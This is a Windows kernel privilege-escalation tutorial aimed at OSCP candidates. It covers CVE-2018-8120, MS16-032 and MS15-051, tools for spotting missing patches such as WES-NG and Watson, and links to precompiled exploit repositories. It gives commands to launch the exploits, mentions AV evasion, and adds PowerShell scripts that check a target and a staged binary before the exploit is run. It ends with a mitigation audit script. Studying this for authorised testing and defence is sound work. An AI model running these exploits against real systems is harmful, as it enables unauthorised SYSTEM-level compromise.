Kernel Exploits

Kernel exploits are powerful privilege escalation vectors that target vulnerabilities in the Windows kernel or kernel-mode drivers. Successfully exploiting these vulnerabilities often results in SYSTEM-level privileges.

Understanding Kernel Exploits

What Are Kernel Exploits?

Kernel exploits target vulnerabilities in the Windows kernel or kernel-mode drivers. These typically involve:

  • Memory corruption vulnerabilities

  • Type confusion issues

  • Use-after-free bugs

  • Improper input validation

  • Race conditions

Why Are They Effective?

  • The kernel runs with the highest privileges (Ring 0)

  • Successful exploitation often grants SYSTEM privileges directly

  • They sidestep user-mode controls such as UAC, integrity levels and user-mode AV hooks, because the payload already runs in the kernel

Limitations and Risks

  • Kernel exploits can be unstable and may crash the system

  • They are often patched quickly by Microsoft

  • Modern Windows systems have mitigations such as KASLR (Kernel Address Space Layout Randomization), KPP (Kernel Patch Protection, "PatchGuard") and, from Windows 8 onward, SMEP (Supervisor Mode Execution Prevention) and a ban on mapping the NULL page, which is why many older exploits, CVE-2018-8120 included, stop at Windows 7

  • Failed exploitation attempts often result in a Blue Screen of Death (BSOD)

Common Windows Kernel Exploits

CVE / Bulletin   Affected Systems                  Description
CVE-2018-8120    Windows 7, Windows Server 2008    Win32k elevation of privilege vulnerability
CVE-2019-0803    Windows 7 to Windows 10           Win32k elevation of privilege vulnerability
CVE-2019-1215    Windows 7 to Windows 10           ws2ifsl.sys use-after-free
CVE-2020-0787    Windows 7 to Windows 10           Background Intelligent Transfer Service (BITS) elevation of privilege
CVE-2021-1732    Windows 10                        Win32k elevation of privilege vulnerability
MS16-032         Windows 7 to Windows 10           Secondary Logon handle privilege escalation
MS15-051         Windows 7 to Windows 8.1          Win32k elevation of privilege

Two entries in this table are not kernel bugs: CVE-2020-0787 lives in the user-mode BITS service and MS16-032 in the Secondary Logon service. They appear in kernel-exploit collections because they are used the same way (drop a binary, get SYSTEM), but they do not carry the BSOD risk of a true kernel exploit.

Example: Exploiting CVE-2018-8120

CVE-2018-8120 is a vulnerability in the Win32k component that affects Windows 7 SP1 and Windows Server 2008 R2 SP1. This is a good example for OSCP practice as it's reliable and affects systems you might encounter during the exam.

Vulnerability Details

  • The vulnerability exists in the way the Win32k component handles objects in memory

  • Specifically, it's a NULL pointer dereference in the NtUserSetImeInfoEx() system call

  • It was fixed in the May 2018 security updates; systems without that month's update, or any later cumulative monthly rollup, remain exposed

Pre-Requisites

  • Windows 7 SP1 x64 or x86 (or Windows Server 2008 R2 SP1)

  • Missing the May 2018 security updates: KB4103718 (monthly rollup) or KB4103712 (security-only update), and every later monthly rollup

Exploitation Steps

  1. Identify a vulnerable system:

    systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  2. Check for the patch:

    wmic qfe | find "KB4103718"
    wmic qfe | find "KB4103712"

    If neither KB is found, also check whether any later monthly rollup is installed (rollups are cumulative and contain the fix) before treating the system as vulnerable. WES-NG accounts for this supersedence automatically.

  3. Transfer the exploit to the target: The compiled exploit can be found at various locations, including:

    • https://github.com/bigric3/cve-2018-8120

  4. Execute the exploit:

    cve-2018-8120.exe

Expected Results

Upon successful exploitation, you'll get a new command prompt with SYSTEM privileges, with output resembling the following (addresses and offsets vary by build):

[*] CVE-2018-8120 exploitation by @bigric3
[*] Exploit for Windows 7 SP1 / 2008 R2 SP1
[+] GDI object allocated
[+] GDI object freed
[+] Pool fengshui...
[+] nt!HaliQuerySystemInformation pointer leaked: 0xFFFFF8800F4FD8A0
[+] nt!_EPROCESS UniqueProcessId offset: 0x180
[+] nt!_EPROCESS Token offset: 0x208
[+] nt!_EPROCESS ActiveProcessLinks offset: 0x188
[+] Current process: 0xFFFFF8800F228780
[+] System process: 0xFFFFF8800F241340
[+] Stealing System token...
[+] Token stealing completed successfully!
[+] Enjoy SYSTEM shell ;)

C:\>whoami
nt authority\system

Determining if a System is Vulnerable

To identify potential kernel vulnerabilities:

  1. Get system information:

    systeminfo
  2. Check for installed patches:

    wmic qfe list brief
  3. Use Windows Exploit Suggester: On your attack machine:

    # Get systeminfo from target
    # Then run:
    python wes.py systeminfo.txt
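The steps above (and steps 1 and 2 of the CVE-2018-8120 walkthrough) combined into one target-side triage script. This is an added example, not code from the original page or from the exploit author; it uses Get-WmiObject instead of Get-CimInstance so it runs on the PowerShell 2.0 that ships with Windows 7 SP1, and it assumes hypothetical staged file names cve-2018-8120-x86.exe and cve-2018-8120-x64.exe (one build per architecture) in the current directory.

```powershell
# Added example, not from the original page: target-side triage for CVE-2018-8120.
# Get-WmiObject is used so this works on Windows 7's stock PowerShell 2.0.
# Assumed (hypothetical) file names: .\cve-2018-8120-x86.exe and .\cve-2018-8120-x64.exe

$os   = Get-WmiObject Win32_OperatingSystem
$ver  = [version]$os.Version                                   # 6.1.7601 on Windows 7 SP1 / 2008 R2 SP1
$arch = if ($os.OSArchitecture -like '64*') { 'x64' } else { 'x86' }
Write-Output "[*] $($os.Caption.Trim()) $($os.Version) $arch"

if (-not ($ver.Major -eq 6 -and $ver.Minor -eq 1)) {
    Write-Output "[-] Kernel is not 6.1 (Windows 7 / Server 2008 R2); CVE-2018-8120 does not apply"
    return
}

# Hotfix inventory as integers; Win32_QuickFixEngineering is the class behind "wmic qfe"
$kbs = @()
foreach ($h in Get-WmiObject Win32_QuickFixEngineering) {
    if ($h.HotFixID -match '^KB(\d+)$') { $kbs += [int]$matches[1] }
}

# May 2018 fix for Windows 7 SP1 / 2008 R2 SP1: KB4103718 (monthly rollup) or KB4103712 (security-only).
# Later monthly rollups are cumulative, so a higher-numbered rollup very likely contains the fix too.
$fixKBs = @(4103718, 4103712)
$direct = @($kbs | Where-Object { $fixKBs -contains $_ })
$newer  = @($kbs | Where-Object { $_ -gt 4103718 })

if ($direct.Count -gt 0) {
    Write-Output "[-] May 2018 update installed (KB$($direct[0])); not vulnerable"
} elseif ($newer.Count -gt 0) {
    $top = ($newer | Measure-Object -Maximum).Maximum
    Write-Output "[?] May 2018 KBs absent but $($newer.Count) higher-numbered hotfixes present (highest KB$top);"
    Write-Output "    a later rollup has probably superseded the fix. Confirm with WES-NG before running the exploit."
} else {
    Write-Output "[+] No May 2018 update and nothing newer: likely vulnerable"
    $exe = ".\cve-2018-8120-$arch.exe"                          # must match the OS architecture, not the shell's
    if (Test-Path $exe) {
        Write-Output "[*] Ready: $exe  (snapshot the VM first; a failed attempt means a BSOD)"
    } else {
        Write-Output "[!] Stage $exe before continuing"
    }
}
```

The "higher-numbered hotfix" branch is a heuristic: KB numbers grow roughly with time, but a servicing-stack update or an unrelated fix can also carry a higher number, so treat that result as "probably patched" and let WES-NG make the call.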

Finding and Using Kernel Exploits

Essential Tools for Finding Kernel Exploits

Windows Exploit Suggester (WES-NG)

WES-NG is a powerful tool that analyzes Windows systeminfo output and suggests potential exploits:

  • Usage:

    # Update the database
    python3 wes.py --update
    
    # Analyze systeminfo output
    python3 wes.py systeminfo.txt
    
    # Show only vulnerabilities that have a public exploit
    python3 wes.py systeminfo.txt --exploits-only
    
    # Narrow to privilege escalation bugs
    python3 wes.py systeminfo.txt --exploits-only --impact "Elevation of Privilege"

Precompiled Kernel Exploits Collection

A comprehensive collection of Windows kernel exploits with precompiled binaries is maintained in the SecWiki windows-kernel-exploits repository listed under "Where to Find Kernel Exploits" below. Check every binary's architecture and hash before using it; these repositories are community-maintained.

Watson

Watson is a .NET tool by rasta-mouse that enumerates missing KBs on the host and suggests exploits. Its current releases cover Windows 10 and Server 2016/2019; for Windows 7 and Server 2008 R2 use the same author's older Sherlock.ps1 script.

  • Usage:

    # Run on the target Windows system
    Watson.exe
  • Advantages:

    • Runs directly on the target system

    • Doesn't require transferring systeminfo output

    • Specifically focused on privilege escalation vulnerabilities

    • Ideal for OSCP scenarios where you have limited user access

Where to Find Kernel Exploits

  • ExploitDB/Searchsploit:

    searchsploit windows kernel local
  • GitHub repositories:

    • https://github.com/SecWiki/windows-kernel-exploits

    • https://github.com/abatchy17/WindowsExploits

  • Exploit sources on Kali: /usr/share/exploitdb/exploits/windows/local/ (mostly source code and write-ups, not binaries; precompiled builds ship in the separate exploitdb-bin-sploits package)

Preparing Exploits for Use

Most kernel exploits need to be compiled or modified before use:

  1. For precompiled binaries:

    • Check architecture (x86 vs x64)

    • Use AV evasion techniques if needed

    • Transfer to target using methods like certutil.exe or SMB

  2. For source code:

    • Compile with the appropriate tools: Visual Studio on Windows, or mingw-w64 on Kali (i686-w64-mingw32-gcc for x86, x86_64-w64-mingw32-gcc for x64) for .c/.cpp sources

    • Ensure correct architecture

    • Strip debugging information to reduce size
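The two checks that prevent most self-inflicted BSODs, wrong architecture and a truncated or tampered transfer, can be done on the target without extra tools. This is an added example, not code from the original page: it reads the PE header directly (e_lfanew at offset 0x3C points to the "PE\0\0" signature, followed by the COFF Machine field, 0x014C for x86 and 0x8664 for x64) and compares a SHA-256 against the value computed on the attack box. The path cve-2018-8120.exe in the usage line is an assumed example.

```powershell
# Added example, not from the original page: verify a staged exploit binary before running it.
# Works on PowerShell 2.0 and later (no Get-FileHash, which needs PowerShell 4).

function Get-PEMachine {
    param([string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 0x40 -or $b[0] -ne 0x4D -or $b[1] -ne 0x5A) { throw "$Path : no MZ header" }
    $pe = [BitConverter]::ToInt32($b, 0x3C)                       # e_lfanew
    if ($pe -lt 0 -or $pe + 6 -gt $b.Length -or [BitConverter]::ToUInt32($b, $pe) -ne 0x00004550) {
        throw "$Path : no PE signature"
    }
    switch ([BitConverter]::ToUInt16($b, $pe + 4)) {               # IMAGE_FILE_HEADER.Machine
        0x014C  { 'x86' }
        0x8664  { 'x64' }
        default { 'other' }
    }
}

function Test-ExploitBinary {
    param([string]$Path, [string]$ExpectedSha256)
    $osArch   = if ((Get-WmiObject Win32_OperatingSystem).OSArchitecture -like '64*') { 'x64' } else { 'x86' }
    $exeArch  = Get-PEMachine $Path
    $procArch = if ([IntPtr]::Size -eq 8) { 'x64' } else { 'x86' }

    # Integrity: certutil/SMB transfers can truncate and AV can quarantine-and-replace;
    # compare with "sha256sum" on the attack box
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $hash = ([BitConverter]::ToString($sha.ComputeHash([System.IO.File]::ReadAllBytes($Path)))) -replace '-', ''
    Write-Host "[*] $Path : built for $exeArch, OS is $osArch, shell is $procArch, sha256 $hash"

    $ok = $true
    if ($exeArch -ne $osArch) {
        Write-Host "[!] Architecture mismatch: a $exeArch build carries $exeArch offsets and shellcode; on a $osArch kernel it will fail or crash"
        $ok = $false
    }
    if ($ExpectedSha256 -and $hash -ne $ExpectedSha256.ToUpper()) {
        Write-Host "[!] Hash mismatch: transfer was incomplete or the file was modified"
        $ok = $false
    }
    if ($procArch -ne $osArch) {
        Write-Host "[?] 32-bit shell on a 64-bit OS: System32 paths are redirected to SysWOW64; the exploit itself still runs natively"
    }
    return $ok
}

# Usage (assumed path): Test-ExploitBinary -Path .\cve-2018-8120.exe -ExpectedSha256 '<hash from sha256sum on Kali>'
```

The function returns $true only when architecture and hash both check out, so it can gate the exploit launch in a larger script.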

Testing Kernel Exploits Safely

Given the unstable nature of kernel exploits:

  1. Take a snapshot/backup if in a VM environment

  2. Save any important work before running exploits

  3. Test in a controlled environment first

  4. Be prepared for system crashes

Other Common Kernel Exploit Examples

MS16-032

Affects Windows 7-10 and Server 2008-2012 R2. Exploits a handle leak in the Secondary Logon service (seclogon). This is a user-mode service bug rather than a kernel vulnerability, so a failed attempt will not crash the system.

# PowerShell implementation
powershell -exec bypass -command "& {Import-Module .\MS16-032.ps1; Invoke-MS16-032}"

MS15-051

Affects Windows 7-8.1 and Server 2008-2012 R2. Exploits a vulnerability in the Win32k subsystem (CVE-2015-1701); this is a true kernel exploit, so the BSOD caveat applies.

ms15-051.exe "command to run as SYSTEM"

OSCP Notes

For the OSCP exam:

  1. Prioritize stable exploits like CVE-2018-8120 for Windows 7

  2. Test exploits thoroughly in lab environments

  3. Have multiple kernel exploits prepared for different Windows versions

  4. Be ready with a recovery plan if the exploit crashes the system

  5. Focus on unpatched legacy systems (Windows 7, Windows Server 2008 R2)

  6. Check target architecture carefully to use the correct exploit version

  7. Download and organize key exploits before the exam - have them ready in your toolkit

Mitigation and Prevention

To protect systems from kernel exploits:

  1. Keep systems updated with the latest security patches

  2. Enable Credential Guard and Device Guard on supported systems

  3. Use Windows Defender Exploit Guard (Exploit Protection, Windows 10 1709 and later) for additional protection; EMET reached end of life in 2018 and only remains relevant on older systems

  4. Implement principle of least privilege - avoid running as administrator

  5. Use application whitelisting to prevent execution of unauthorized exploits
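A quick audit of whether those controls are actually in force on a Windows 10 / Server 2016+ host, as an added example (not code from the original page). It assumes an elevated prompt and Windows 10 1709 or later for Get-ProcessMitigation; the Win32_DeviceGuard status codes are the documented ones (VirtualizationBasedSecurityStatus 2 = running; SecurityServicesRunning 1 = Credential Guard, 2 = HVCI).

```powershell
# Added example, not from the original page: check the mitigations recommended above.

# Virtualization-based security: Credential Guard and HVCI (the kernel code-integrity
# half of Device Guard) both report through Win32_DeviceGuard
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
$vbsRunning = ($dg.VirtualizationBasedSecurityStatus -eq 2)      # 0 = off, 1 = configured, 2 = running
$credGuard  = ($dg.SecurityServicesRunning -contains 1)           # 1 = Credential Guard
$hvci       = ($dg.SecurityServicesRunning -contains 2)           # 2 = Hypervisor-protected code integrity
"VBS running: $vbsRunning  Credential Guard: $credGuard  HVCI: $hvci"

# Exploit Protection (EMET's successor): system-wide DEP, CFG and SEHOP settings
$m = Get-ProcessMitigation -System
"DEP: $($m.Dep.Enable)  CFG: $($m.Cfg.Enable)  SEHOP: $($m.SEHOP.Enable)"

# Patch level: a stale newest hotfix is the real kernel-exploit exposure
$newest = Get-HotFix | Where-Object { $_.InstalledOn } | Sort-Object InstalledOn -Descending | Select-Object -First 1
"Newest hotfix: $($newest.HotFixID) installed $($newest.InstalledOn.ToShortDateString())"

# Application control: is there an effective AppLocker policy with Exe rules at all?
$exeRules = (Get-AppLockerPolicy -Effective).RuleCollections | Where-Object { $_.RuleCollectionType -eq 'Exe' }
"AppLocker Exe rules: $(if ($exeRules) { $exeRules.Count } else { 0 })"
```

HVCI is the control that matters most against the exploits on this page: with it running, the kernel refuses to execute unsigned or writable code pages, which breaks the classic "map shellcode in user mode and jump to it" pattern even where a vulnerable driver is still loaded.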
